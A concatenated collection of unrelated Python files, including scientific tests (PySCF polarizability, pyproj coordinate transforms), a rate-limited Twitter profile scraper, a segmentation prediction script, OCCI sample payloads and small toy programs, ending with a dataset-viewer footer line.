        #print(__name__, 'gto.mo_energy', gto_mf.mo_energy)
        nao_td = bse_iter(mf=gto_mf, gto=mol, verbosity=0, perform_gw=True)
        # Real-axis frequency grid with a small imaginary broadening.
        omegas = np.linspace(0.0,2.0,450)+1j*0.04
        # Imaginary part of the non-interacting average polarizability.
        p_iter = -nao_td.comp_polariz_nonin_ave(omegas).imag
        # First column converts energies to eV (1 Hartree = 27.2114 eV).
        data = np.array([omegas.real*27.2114, p_iter])
        np.savetxt('be.bse_iter.omega.nonin.ave.txt', data.T, fmt=['%f','%f'])

if __name__ == "__main__": unittest.main()
|
import warnings
from numpy.testing import assert_almost_equal
from pyproj import Proj, proj_version_str, transform
# illustrates the use of the transform function to
# perform coordinate transformations with datum shifts.
#
# This example is from Roberto Vidmar
#
# Test point is Trieste, Molo Sartorio
#
# This data come from the Istituto Geografico Militare (IGM), as well as
# the 7 parameters to transform from Gauss-Boaga (our reference frame)
# to WGS84
#
# WGS84 Lat: 45d38'49.879" (45.647188611)
# WGS84 Lon: 13d45'34.397" (13.759554722)
# WGS84 z: 52.80;
# UTM 33: 403340.97 5055597.17
# GB: 2423346.99 5055619.87
# Reference coordinates of the test point (Trieste, Molo Sartorio).
UTM_x = 403340.9672367854
UTM_y = 5055597.175553089
GB_x = 2423346.99
GB_y = 5055619.87
WGS84_lat = 45.647188611  # Degrees
WGS84_lon = 13.759554722  # Degrees
UTM_z = WGS84_z = 52.8  # Ellipsoidical height in meters

WGS84_PROJ = Proj(proj="latlong", datum="WGS84")
UTM_33_PROJ = Proj(proj="utm", zone="33")
# Gauss-Boaga (EPSG:3004) with the IGM 7-parameter Helmert shift toward
# WGS84; the init= syntax is deprecated in pyproj 2+, hence the
# suppressed DeprecationWarning.
with warnings.catch_warnings():
    warnings.simplefilter("ignore", DeprecationWarning)
    GAUSSSB_PROJ = Proj(
        init="epsg:3004", towgs84="-122.74,-34.27,-22.83,-1.884,-3.400,-3.030,-15.62"
    )
print("proj4 library version = ", proj_version_str)
def test_shift_wgs84_to_utm33():
    """WGS84 lon/lat/height transforms to the reference UTM zone 33 point."""
    xutm33, yutm33, zutm33 = transform(
        WGS84_PROJ, UTM_33_PROJ, WGS84_lon, WGS84_lat, WGS84_z
    )
    assert_almost_equal((xutm33, yutm33, zutm33), (UTM_x, UTM_y, UTM_z))

def test_shift_utm33_to_wgs84():
    """Inverse of the previous transform recovers the WGS84 coordinates."""
    back_lon, back_lat, back_z = transform(UTM_33_PROJ, WGS84_PROJ, UTM_x, UTM_y, UTM_z)
    assert_almost_equal((back_lon, back_lat, back_z), (WGS84_lon, WGS84_lat, WGS84_z))

def test_shift_wgs84_to_gaussb_no_ellisoidal_height():
    """Datum shift to Gauss-Boaga with the ellipsoidal height forced to 0.

    The y reference differs slightly from GB_y because the height term is
    dropped, hence the dedicated expected value and looser tolerance.
    """
    xgb, ygb, zgb = transform(WGS84_PROJ, GAUSSSB_PROJ, WGS84_lon, WGS84_lat, 0)
    assert_almost_equal((xgb, ygb, zgb), (GB_x, 5055619.899, 0), decimal=2)

def test_shift_gaussb_to_wgs84_no_ellisoidal_height():
    """Inverse Gauss-Boaga -> WGS84 shift, height forced to 0."""
    back_lon, back_lat, back_z = transform(GAUSSSB_PROJ, WGS84_PROJ, GB_x, GB_y, 0)
    assert_almost_equal(
        (back_lon, back_lat, back_z), (WGS84_lon, WGS84_lat, 0), decimal=3
    )
|
class BankAccount(object):
    """A minimal bank account holding a mutable balance."""

    def __init__(self, balance):
        self.balance = balance

    def deposit(self, amount):
        """Add `amount` to the balance and return the new balance.

        The original also stored `self.amount` (the last deposit), which
        nothing read; that stray attribute has been removed.
        """
        self.balance += amount
        return self.balance

    def withdraw(self, amount):
        """Remove `amount` from the balance.

        Returns the new balance on success, or the string
        'invalid transaction' when funds are insufficient. (The original
        returned None on success, inconsistently with deposit().)
        """
        if amount > self.balance:
            return 'invalid transaction'
        self.balance -= amount
        return self.balance
class MinimumBalanceAccount(BankAccount):
    """BankAccount variant intended to enforce a minimum balance."""

    def __init__(self, balance):
        # Delegate to BankAccount. The original called
        # super(BankAccount, self).__init__(), which resolves PAST
        # BankAccount (to object) and never runs its initializer, so the
        # balance had to be assigned by hand.
        super(MinimumBalanceAccount, self).__init__(balance)
|
#! /usr/bin/python3
import calendar
import email.utils
import pkgutil
import sys
import time
import twython
from lib.shared import url_database
class DbStub:
    """Minimal settings object for url_database.ensure_database().

    Only the `database` attribute is exposed; it names the scraper's
    PostgreSQL database.
    """

    def __init__(self):
        # Hard-coded target database.
        self.database = "tbbscraper_db"
def connect_to_twitter_api():
    """Build an authenticated Twython client from packaged credentials.

    The credential file holds four whitespace-separated tokens:
    app key, app secret, OAuth token, OAuth secret.
    """
    # NOTE(review): pkgutil.get_data returns bytes, so under Python 3
    # these tokens are bytes objects — confirm twython accepts them.
    cred = pkgutil.get_data("lib.url_sources", "twitter_credential.txt").strip()
    (app_key, app_secret, oauth_token, oauth_secret) = cred.split()
    return twython.Twython(app_key, app_secret, oauth_token, oauth_secret)
class RateLimitWrapper:
    """Wrap one Twitter API method, pacing calls to respect its rate limit.

    On construction (and whenever a window is exhausted) the wrapper
    queries the application rate-limit status for the method's resource
    family, then spreads the remaining calls evenly over the time left in
    the current window. Progress is logged to stderr.
    """

    def __init__(self, api, method, method_name, family):
        self.api = api
        self.method = method            # bound API method to invoke
        self.method_name = method_name  # endpoint key, e.g. "/users/lookup"
        self.family = family            # rate-limit resource family, e.g. "users"
        self.update()

    def update(self):
        """Refresh remaining-call count, window reset time, and pacing interval."""
        data = self.api.get_application_rate_limit_status(resources=self.family)
        data = data["resources"][self.family][self.method_name]
        self.remaining = data["remaining"]
        self.reset_time = data["reset"]
        now = time.time()
        self.last_call_time = now
        if self.remaining > 0:
            # Spread the remaining calls evenly across the rest of the window.
            self.interval = (self.reset_time - now) / self.remaining
        else:
            # No calls left: the only option is to wait out the window.
            self.interval = self.reset_time - now
        sys.stderr.write("\n{}: {} calls before {}, interval={:.3}s\n"
                         .format(time.strftime("%H:%M:%S", time.gmtime(now)),
                                 self.remaining,
                                 time.strftime("%H:%M:%S",
                                               time.gmtime(self.reset_time)),
                                 self.interval))

    def __call__(self, **params):
        """Invoke the wrapped method, sleeping first if pacing requires it."""
        now = time.time()
        till_end_of_window = self.reset_time - now
        if self.remaining == 0 or till_end_of_window < 0:
            # If we are completely out of calls, wait out the entire
            # window and then query for a new window.
            if till_end_of_window > 0:
                sys.stderr.write("(waiting {:.3}s)".format(till_end_of_window))
                sys.stderr.flush()
                time.sleep(till_end_of_window)
            self.update()
        else:
            # Spread the method calls we're allowed to make over the
            # window between now and the reset time.
            delay = (self.last_call_time + self.interval) - now
            if delay > 0:
                sys.stderr.write("(waiting {:.3}s)".format(delay))
                sys.stderr.flush()
                time.sleep(delay)
        self.last_call_time = time.time()
        self.remaining -= 1
        return self.method(**params)
def next_ublock(lookup_user, block):
    """Look up one batch of user rows via the API; return [] on a 404.

    `block` is a sequence of DB rows whose first column is a user id.
    """
    uid_string = ",".join(str(r[0]) for r in block)
    try:
        return lookup_user(user_id=uid_string, include_entities=False)
    except twython.TwythonError:
        # "If none of your lookup criteria can be satisfied by
        # returning a user object, a HTTP 404 will be thrown."
        # I *think* in our case this means "if none of the users in
        # the block exist anymore" but let's log 'em just to be sure.
        sys.stderr.write("\n404 Not Found: " + uid_string + "\n")
        sys.stderr.flush()
        return []
def main():
    """Refresh profile data for every known Twitter user and collect the
    URLs found in their profiles.

    Pass 1 reads all uids, fetches profiles in batches, and accumulates
    user records plus (expanded_url, uid) pairs in memory; pass 2 writes
    both back to the database.
    """
    db = url_database.ensure_database(DbStub())
    twi = connect_to_twitter_api()
    # Pace /users/lookup calls according to the "users" rate-limit family.
    lookup_user = RateLimitWrapper(twi, twi.lookup_user,
                                   "/users/lookup", "users")
    urls = []
    users = []
    with db, db.cursor() as cur:
        cur.execute("SELECT uid FROM twitter_users")
        while True:
            sys.stderr.write("\r{} users, {} urls...\033[K"
                             .format(len(users), len(urls)))
            sys.stderr.flush()
            # The lookup endpoint accepts at most 100 ids per call.
            block = cur.fetchmany(100)
            if not block: break
            ublock = next_ublock(lookup_user, block)
            for u in ublock:
                users.append(
                    { 'id': u['id'],
                      # no created_at_in_seconds for users :-(
                      'ca': calendar.timegm(
                          email.utils.parsedate(u['created_at'])),
                      'vr': int(u.get('verified', False)),
                      'pr': int(u.get('protected', False)),
                      'sn': u['screen_name'],
                      'nm': u.get('name', ""),
                      'la': u.get('lang', ""),
                      'lo': u.get('location', ""),
                      'ds': u.get('description', "") })
                # Collect every expanded URL from the profile's entities.
                for thing in u.get('entities', {}).values():
                    for url in thing.get('urls', []):
                        eu = url.get('expanded_url', None)
                        if eu:
                            urls.append((eu, u['id']))
    with db, db.cursor() as cur:
        sys.stderr.write("\nrecording url strings...")
        # Intern each url string, then deduplicate (url-id, uid) pairs.
        urls = list(set((url_database.add_url_string(cur, url[0])[0], url[1])
                        for url in urls))
        sys.stderr.write("\nupdating user table...")
        cur.executemany(
            "UPDATE twitter_users"
            " SET created_at = %(ca)s,"
            " verified = %(vr)s,"
            " protected = %(pr)s,"
            " screen_name = %(sn)s,"
            " full_name = %(nm)s,"
            " lang = %(la)s,"
            " location = %(lo)s,"
            " description = %(ds)s"
            " WHERE uid = %(id)s",
            users)
        sys.stderr.write("\nupdating urls table...")
        cur.executemany(
            "INSERT INTO urls_twitter_user_profiles (url, uid) "
            " VALUES (%s, %s)",
            urls)
        sys.stderr.write("\n")

# NOTE(review): runs on import as well as when executed directly —
# consider guarding with `if __name__ == "__main__":`.
main()
|
import os

# Set library exports
from . import kernels, sparse, center_selection, preconditioner, optim
from .options import FalkonOptions
from .models import Falkon, LogisticFalkon, InCoreFalkon

# Directory containing this __init__.py; used to locate the VERSION file.
init_dir = os.path.dirname(os.path.abspath(__file__))
# Set __version__ attribute on the package
with open(os.path.join(init_dir, 'VERSION')) as version_file:
    __version__ = version_file.read().strip()

# Explicit public API of the package.
__all__ = (
    'Falkon',
    'LogisticFalkon',
    'InCoreFalkon',
    'kernels',
    'optim',
    'preconditioner',
    'center_selection',
    'sparse',
    'FalkonOptions',
)
|
from application import celery
@celery.task
def simple_task():
    """Trivial Celery task used to verify the worker wiring."""
    return "Hello, world!"
|
from argparse import _SubParsersAction
import torch
from pathlib import Path
from skimage import io as skio
from utils.patch_utils import get_file_lists, load_image
from utils.train import seed_all, set_model, get_calculated_means_stds_trainval, get_patch_lists
from utils.predict import get_test_loader, predict, reshape_predictions_to_images
from utils.parser import create_test_parser
# Command-line arguments: data subset to predict on, project root, path to
# the trained model weights, and inference batch size.
args = create_test_parser()
subset:str = args.subset
root_path:str = args.root_path
model_save_path:str = args.model
batch_size:int = args.batch_size
device:str = "cuda" if torch.cuda.is_available() else "cpu"

# Seed all RNGs for reproducible runs.
seed_all(seed=args.seed)
print(f"Using Seed {args.seed}")

data_path = Path(root_path) / "data"
# The weight filename is assumed to encode
# "..._<architecture>_<feature_extractor>_<...>" — TODO confirm the
# naming convention used at training time.
model_save_stem = model_save_path.split('/')[-1]
architecture = model_save_stem.split('_')[-3]
feature_extractor = model_save_stem.split('_')[-2]
path_to_save = Path(root_path) / "results" / "predictions" / subset
path_to_save.mkdir(parents=True, exist_ok=True)

# Patch-level image/mask paths plus the full-size source images.
test_imgs, test_msks = get_patch_lists(
    data_path=data_path,
    subset=subset)
test_complete_img_ls, _ = get_file_lists(
    data_path,
    subset=subset)
# Shape of one full (un-patched) image; predictions are reassembled to it.
img_shape = load_image(path = str(test_complete_img_ls[0])).shape
# Normalization statistics computed on the train/val split.
means, stds = get_calculated_means_stds_trainval()
test_loader = get_test_loader(
    test_img_dir=test_imgs,
    test_msk_dir=test_msks,
    mean=means,
    std=stds,
    batch_size=batch_size,
)
# Restore the trained weights into a freshly built model.
loaded_model = torch.load(model_save_path)
print(f"Loading: {architecture} {feature_extractor} ...")
model = set_model(architecture=architecture, feature_extractor=feature_extractor).to(device=device)
model.load_state_dict(loaded_model)
preds = predict(
    model=model,
    test_loader=test_loader,
    device=device)
# NOTE(review): this message prints after predict() has already finished.
print(f"Predicting...")
print("Combining Slices...")
# Map class indices to RGB colours and stitch patch predictions back into
# full-size masks.
colored_predictions = reshape_predictions_to_images(preds=preds, labels=[(199, 199, 199), (31, 119, 180), (255, 127, 14)], mask_shape =img_shape[:2])
print(f"Saving Predictions to {path_to_save}...")
for preds_to_save, img_name in zip(colored_predictions, test_complete_img_ls):
    skio.imsave(f"{path_to_save}/{img_name.stem}_pred.png", preds_to_save, check_contrast=False)
# Copyright 2010-2012 Institut Mines-Telecom
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jun 19, 2012
@author: Bilel Msekni
@contact: bilel.msekni@telecom-sudparis.eu
@author: Houssem Medhioub
@contact: houssem.medhioub@it-sudparis.eu
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
#=======================================================================================================================
# JSON format
#=======================================================================================================================
resource = """{
"resources": [
{
"kind": "http://schemas.ogf.org/occi/infrastructure#compute",
"mixins": [
"http://example.com/template/resource#medium"
],
"attributes": {
"occi": {
"compute": {
"speed": 2,
"memory": 4,
"cores": 12
}
}
},
"actions": [
{
"title": "Start My Server",
"href": "/compute/996ad860-2a9a-504f-8861-aeafd0b2ae29?action=start",
"category": "http://schemas.ogf.org/occi/infrastructure/compute/action#start"
}
],
"id": "9930",
"title": "Compute resource",
"summary": "This is a compute resource"
}
]
}
"""
#=======================================================================================================================
link = """
{
"links": [
{
"kind": "http://schemas.ogf.org/occi/infrastructure#compute",
"mixins": [
"http://example.com/template/resource#medium"
],
"attributes": {
"occi": {
"infrastructure": {
"networkinterface": {
"interface": "eth0",
"mac": "00:80:41:ae:fd:7e",
"address": "192.168.0.100",
"gateway": "192.168.0.1",
"allocation": "dynamic"
}
}
}
},
"id": "22fe83ae-a20f-54fc-b436-cec85c94c5e8",
"title": "Mynetworkinterface",
"target": "http://127.0.0.1:8090/bilel/vms/v2",
"source": "http://127.0.0.1:8090/bilel/vms/v1"
}
]
}
"""
#=======================================================================================================================
j_occi_att = """
{
"resources": [
{
"attributes": {
"occi": {
"compute": {
"speed": 2,
"memory": 4,
"cores": 12
}
}
}
}
]
}
"""
action_plus_attributes =\
"""
{
"actions": [
{
"term": "start",
"scheme": "http://schemas.ogf.org/occi/infrastructure/compute/action#",
"title": "Start Compute instance now",
"attributes": {
"method": {
"mutable": true,
"required": false,
"type": "string",
"pattern": "graceful|acpion|poweron",
"default": "poweron"
}
}
}
],
"attributes": {
"occi": {
"infrastructure": {
"networkinterface": {
"interface": "eth0",
"mac": "00:80:41:ae:fd:7e",
"address": "192.168.0.100",
"gateway": "192.168.0.1",
"allocation": "dynamic"
}
}
}
}
}
"""
#=======================================================================================================================
# HTTP format
#=======================================================================================================================
# Sample entity rendering in the text/occi (HTTP header) format.
# NOTE(review): the adjacent string literals concatenate with NO newline
# between header lines (e.g. "...cores=2Link: ...") — confirm whether the
# consumer re-splits on header names or whether this is a defect.
entity_http = "Category: compute; scheme=\"http://schemas.ogf.org/occi/infrastructure#\"; class=\"kind\";"\
"Category: my_stuff; scheme=\"http://example.com/template/resource#\"; class=\"medium\";"\
"X-OCCI-Attribute: occi.compute.cores=2"\
"Link: </users/foo/compute/b9ff813e-fee5-4a9d-b839-673f39746096?action=start>;"\
"rel=\"http://schemas.ogf.org/occi/infrastructure/compute/action#start\""
#=======================================================================================================================
# A single attribute line in text/occi format.
x_occi_att = "X-OCCI-Attribute: occi.compute.cores=20:2"
# An action category plus an attribute, as a multi-line header sample.
action_att_http = """Category: start;
scheme="http://schemas.ogf.org/occi/infrastructure/compute/action#";
class=action;
X-OCCI-Attribute: occi.compute.cores=20:2
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Hello World
author: gxcuizy
date: 2018-10-15
"""
import random

# Program entry point
if __name__ == '__main__':
    # Greeting
    print('Hello World!')
    # Draw 4 distinct random numbers from [0, 499]. random.sample
    # guarantees uniqueness, replacing the original manual loop that
    # retried on duplicates.
    rand_list = random.sample(range(500), 4)
    # Print the random team grouping codes
    print(rand_list)
|
import py
from pypy.rpython.test.test_rstr import BaseTestRstr
from pypy.translator.llvm.test.runtest import *
# ====> ../../../rpython/test/test_rstr.py
class TestLLVMStr(LLVMTest, BaseTestRstr):
    """Run the generic RPython string tests through the LLVM backend."""
    # Hash the backend is expected to produce for the empty string.
    EMPTY_STRING_HASH = -1

    def test_int(self):
        # Not yet supported by the LLVM backend; see marker in message.
        py.test.skip('XXX special case me')

    def test_float(self):
        py.test.skip('XXX special case me')

    def test_inplace_add(self):
        py.test.skip('XXX special case me')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.